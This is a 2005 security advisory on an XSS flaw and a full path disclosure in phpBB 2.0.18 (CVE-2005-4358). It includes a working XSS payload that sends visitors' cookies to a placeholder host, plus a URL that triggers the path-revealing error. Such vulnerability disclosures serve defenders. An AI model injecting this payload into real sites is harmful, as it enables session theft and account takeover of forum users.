phpBB 2.0.18 XSS and Full Path Disclosure

Published
Credit
Risk
2005.12.17
Maksymilian Arciemowicz
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2005-4358
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always allow HTML: YES" or are you Guest

that you can use this tags:

<B C=">" onmouseover="alert('cxsecurity.com')" X="<B "> H E L O </B>

Exploit:

<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)" X="<B "> H A L O </B>

and have you cookies.

- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is

- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);

return;
}
- -25-31---

function append_sid() dosen't exists. And if you have:

register_globals = On
display_errors = On

Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1

- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---

- --- 3.Contact ---
Author: Maksymilian Arciemowicz

References:

http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=352966


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com